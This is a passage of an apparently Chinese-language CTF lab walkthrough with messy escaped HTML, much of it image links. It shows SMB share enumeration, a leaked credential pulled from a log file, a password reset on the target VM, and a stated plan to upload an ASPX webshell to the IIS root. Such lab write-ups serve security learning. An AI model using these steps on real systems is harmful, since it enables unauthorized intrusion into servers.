smbclient -L \/\/172.20.10.4\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\n\n Sharename Type Comment\n --------- ---- -------\n ADMIN$ Disk Admin remota\n C$ Disk Recurso predeterminado\n IPC$ IPC IPC remota\n LOGS Disk \n WEB Disk <\/code><\/pre>\n\u7136\u540e\u5f97\u5230LOGS<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u4e0b\u4e00\u6b65\uff1a<\/p>\nsmbclient \/\/172.20.10.4\/LOGS\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n\n 20231008.log \n\nsmb: \\> get 20231008.log <\/code><\/pre>\ncat 20231008.log\nPS C:\\> dir \\\\127.0.0.1\\WEB\nAcceso denegado\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : PermissionDenied: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], UnauthorizedAccessException\n + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand\nCannot find path '\\\\127.0.0.1\\WEB' because it does not exist.\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : ObjectNotFound: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], ItemNotFoundException\n + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n\nPS C:\\> net use \\\\127.0.0.1\\WEB\nSe ha completado el comando correctamente.\n\nPS C:\\> dir \\\\127.0.0.1\\WEB\nAcceso denegado\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : PermissionDenied: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], UnauthorizedAccessException\n + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand\nCannot find path '\\\\127.0.0.1\\WEB' because it does not exist.\nAt line:1 char:1\n+ dir \\\\127.0.0.1\\WEB\n+ ~~~~~~~~~~~~~~~~~~~\n + CategoryInfo : ObjectNotFound: (\\\\127.0.0.1\\WEB:String) [Get-ChildItem], ItemNotFoundException\n + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n\nPS C:\\> net use \\\\127.0.0.1\\WEB \/user:marcos SuperPassword\nSe ha completado el comando correctamente.\n\nPS C:\\> dir \\\\127.0.0.1\\WEB\n\n Directorio: \\\\127.0.0.1\\WEB\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\nd----- 10\/8\/2023 9:46 PM aspnet_client\n-a---- 9\/26\/2023 6:46 PM 703 iisstart.htm\n-a---- 10\/8\/2023 10:46 PM 158 test.php\n\nPS C:\\> rm \\\\127.0.0.1\\WEB\\*.php\n\nPS C:\\> dir \\\\127.0.0.1\\WEB\n\n Directorio: \\\\127.0.0.1\\WEB\n\nMode LastWriteTime Length Name\n---- ------------- ------ ----\nd----- 10\/8\/2023 9:46 PM aspnet_client\n-a---- 9\/26\/2023 6:46 PM 703 iisstart.htm\n\nPS C:\\> <\/code><\/pre>\n\u8bf4\u660e\u627e\u5230\u4e86WEB<\/code>\u76ee\u5f55\uff0c\u4ee5\u53ca\u8d26\u53f7\u5bc6\u7801\uff1auser:marcos SuperPassword<\/code><\/p>\n\u5230\u8fd9\u91cc\u4e3a\u6b62\uff0c\u6211\u90fd\u505a\u4e0d\u4e86\uff0c\u4e0b\u9762\u6211\u63a5\u7740\u5728\u672c\u673a\u4e0a\u8fdb\u884c\u64cd\u4f5c\u4e00\u4e0b\u54c8\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient \/\/172.20.10.4\/WEB\/ -U marcos\nPassword for [WORKGROUP\\marcos]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n\u5f53\u6211\u6ca1\u8bf4\u3002\u3002\u3002\u3002\u9000\u4e00\u6b65\u8d8a\u60f3\u8d8a\u6c14\uff0c\u5c1d\u8bd5\u80fd\u4e0d\u80fd\u8fdb\u5165\u7cfb\u7edf\u4fee\u6539\u4e00\u4e0b\uff1a<\/p>\n
\u89e3\u51b3bug<\/h3>\n
\u70b9\u51fb\u53f3\u8fb9\u7684\u90a3\u4e2actrl+del<\/code>:<\/p>\n<\/div><\/p>\n\u6309esc<\/code>\u8fdb\u5165\u7528\u6237\u5217\u8868\uff1a<\/p>\n<\/div>
\n<\/div><\/p>\n\u7136\u540e\u5bc4\u4e86\uff0c\u8fd9\u4ee8\u5bc6\u7801\u6211\u4eec\u4e00\u4e2a\u90fd\u4e0d\u77e5\u9053\u3002\u3002\u3002\u6211\u9009\u4e86bogo\u7136\u540e\u7167\u7740\u9875\u9762\uff0c\u6309\u4e86\u5565esc<\/code>\u5565\u7684\uff0c\u7136\u540e\u8f93\u5165\u7684\u5730\u65b9\u5168\u9009\u4e86bogo<\/code>\uff0c\u7136\u540e\u83ab\u540d\u5947\u5999\u8fdb\u6765\u4e86\u3002\u3002<\/p>\n<\/div><\/p>\n\u4e0d\u8981\u614c\uff0c\u4e0b\u9762\u8fd8\u8981\u6539\u4e00\u4e2a\uff0c\u6211\u4e0b\u9762\u518d\u622a\u56fe\uff1a<\/p>\n
\u518d\u626b\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient -L \/\/172.20.10.4\/ -U bogo\nPassword for [WORKGROUP\\bogo]:\n\n Sharename Type Comment\n --------- ---- -------\n ADMIN$ Disk Admin remota\n C$ Disk Recurso predeterminado\n IPC$ IPC IPC remota\n LOGS Disk \n WEB Disk \nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 172.20.10.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available<\/code><\/pre>\n<\/div><\/p>\n\u6211\u524d\u9762\u53ef\u6ca1\u6284\u55f7\uff01\u8bfb\u4e66\u4eba\u7684\u4e8b\u600e\u4e48\u80fd\u53eb\u6284\u5462\u3002<\/p>\n
\u6211\u771ftm\u725b\u903c\uff0c\u518d\u6539\u4e00\u4e0b\u53e6\u4e00\u4e2a\uff0c\u8fd9\u6b21\u6211\u4e00\u6b65\u4e00\u622a\u56fe\uff1a<\/p>\n
<\/div><\/p>\n\u7b2c\u4e00\u6b65<\/h4>\n
\u5148\u6309\u7a7a\u683c\u53f3\u8fb9\u7684ctrl+del<\/code><\/p>\n<\/div><\/p>\n\u7b2c\u4e8c\u6b65<\/h4>\n
\u6309esc<\/code>\u4e24\u6b21\uff0c\u754c\u9762\u53d8\u4e86\u5c31\u4e0d\u7528\u6309\u4e86\uff0c\u4e00\u76f4\u6ca1\u53d8\u7684\u8bdd\u70b9\u51fb\u4e00\u4e0b\u90a3\u4e2a\u5c4f\u5e55\u518d\u6309<\/p>\n<\/div><\/p>\n\u518d\u6309esc<\/code>:<\/p>\n<\/div><\/p>\n\u7b2c\u4e09\u6b65<\/h4>\n
\u6211\u4eec\u8981\u6539\u7b2c\u4e09\u4e2a\u5c1d\u8bd5\u4f7f\u7528tab<\/code>\u5230\u90a3\u91cc\uff0c\u7136\u540e\u5148esc<\/code>\u518denter<\/code><\/p>\n<\/div><\/p>\n\u8f93\u5165\u5bc6\u7801\uff1aSuperPassword<\/code>\uff0c\u7136\u540e\u5148esc<\/code>\u518denter<\/code>\uff01<\/p>\n<\/div><\/p>\n\u8001\u6837\u5b50esc<\/code> +enter<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u5168\u90e8\u8f93\u5165SuperPassword<\/code>\uff0c\u8f93\u5165\u5b8c\u4e00\u884ctab<\/code>\u4e00\u4e0b\uff0c\u6700\u540eenter<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u989d\uff0c\u96be\u9053\u5199\u9519\u4e86\uff1f\u518desc + enter<\/code>\u4e00\u4e0b\uff1a<\/p>\n<\/div><\/p>\n\u8fd9\u4e0b\u5bf9\u80c3\u4e86\uff01esc+enter<\/code>\u5c1d\u8bd5\u4e00\u4e0b\u80fd\u5426\u770b\u5230\uff1a<\/p>\n<\/div><\/p>\nok\u4e86\uff01\u9614\u4ee5\u7ee7\u7eed\u505a\u4e86\uff01<\/p>\n
\u7ee7\u7eedSMB<\/h3>\n
\u6839\u636e\u63d0\u53d6\u5230\u7684\u4fe1\u606f\u8fdb\u884c\u64cd\u4f5c\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient -L \/\/172.20.10.4\/WEB -U marcos\nPassword for [WORKGROUP\\marcos]:\n\n Sharename Type Comment\n --------- ---- -------\n ADMIN$ Disk Admin remota\n C$ Disk Recurso predeterminado\n IPC$ IPC IPC remota\n LOGS Disk \n WEB Disk \nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 172.20.10.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/Simple]\n\u2514\u2500# smbclient \/\/172.20.10.4\/WEB -U marcos \nPassword for [WORKGROUP\\marcos]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n . D 0 Sun Oct 8 11:14:24 2023\n .. D 0 Sun Oct 8 11:14:24 2023\n 03-comming-soon D 0 Sun Oct 8 17:22:15 2023\n aspnet_client D 0 Sun Oct 8 15:46:18 2023\n common-js D 0 Sun Oct 8 17:14:09 2023\n fonts D 0 Sun Oct 8 17:14:09 2023\n images D 0 Sun Oct 8 17:14:09 2023\n index.html A 1481 Sun Oct 8 17:26:47 2023\n\n 12966143 blocks of size 4096. 11127775 blocks available\nsmb: \\><\/code><\/pre>\n\u53ef\u4ee5\u770b\u5230\u662f\u6211\u4eec\u7684web\u76ee\u5f55\u4e86\uff0c\u5c1d\u8bd5\u4e0a\u4f20webshell\u8fdb\u884c\u8bbf\u95ee\uff0c\u56e0\u4e3a\u662fIIS\u670d\u52a1\u5668\uff0c\u5c1d\u8bd5\u4e0a\u4f20ASPX\u6216\u8005ASP\u7684webshell\uff01\u9614\u4ee5\u4f7f\u7528kali\u81ea\u5e26\u7684\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528msf\u751f\u6210\u4e00\u4e2a\uff01<\/p>\n
![\"image-20240408121938073\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007894.png\")
<\/div>![\"image-20240408122017494\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007895.png\")
<\/div><\/p>\n![\"image-20240408123531119\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007896.png\")
<\/div><\/p>\n![\"image-20240408125920735\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007897.png\")
<\/div><\/p>\n![\"image-20240408130120232\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007898.png\")
<\/div><\/p>\n![\"image-20240408132023596\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007899.png\")
<\/div><\/p>\n![\"image-20240408132513088\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007900.png\")
<\/div>![\"image-20240408132539336\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007901.png\")
<\/div><\/p>\n![\"image-20240408132800063\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007902.png\")
<\/div><\/p>\n![\"image-20240408133114607\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007903.png\")
<\/div><\/p>\n![\"image-20240408133344847\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007904.png\")
<\/div><\/p>\n![\"image-20240408133402185\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007905.png\")
<\/div><\/p>\n![\"image-20240408133503536\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007906.png\")
<\/div><\/p>\n![\"image-20240408133533133\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007907.png\")
<\/div><\/p>\n![\"image-20240408133643795\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007908.png\")
<\/div><\/p>\n![\"image-20240408133843912\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007910.png\")
<\/div><\/p>\n![\"image-20240408133916989\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007911.png\")
<\/div><\/p>\n![\"image-20240408133916989\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007912.png\")
<\/div><\/p>\n![\"image-20240408134312732\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007913.png\")
<\/div><\/p>\n![\"image-20240408134521411\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007914.png\")
<\/div><\/p>\n![\"image-20240408140236795\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007915.png\")
<\/div><\/p>\n![\"image-20240408140621335\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007916.png\")
<\/div><\/p>\n![\"image-20240408141121346\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007917.png\")
<\/div><\/p>\n![\"image-20240408141141514\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007918.png\")
<\/div><\/p>\n![\"image-20240408141238201\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007919.png\")
<\/div>![\"image-20240408141621840\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007920.png\")
<\/div>![\"image-20240408141542823\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007921.png\")
<\/div><\/p>\n![\"image-20240408141831254\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007922.png\")
<\/div><\/p>\n![\"image-20240408145615633\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007923.png\")
<\/div><\/p>\n![\"image-20240408150047989\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007924.png\")
<\/div><\/p>\n![\"image-20240408150654622\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007925.png\")
<\/div>![\"image-20240408150931845\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007926.png\")
<\/div><\/p>\n![\"image-20240408152027719\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007927.png\")
<\/div>![\"image-20240408152104096\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007928.png\")
<\/div><\/p>\n![\"image-20240408152259491\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007929.png\")
<\/div><\/p>\n![\"image-20240408194502581\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007930.png\")
<\/div><\/p>\n![\"image-20240408195320225\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404082007931.png\")
<\/div><\/p>\n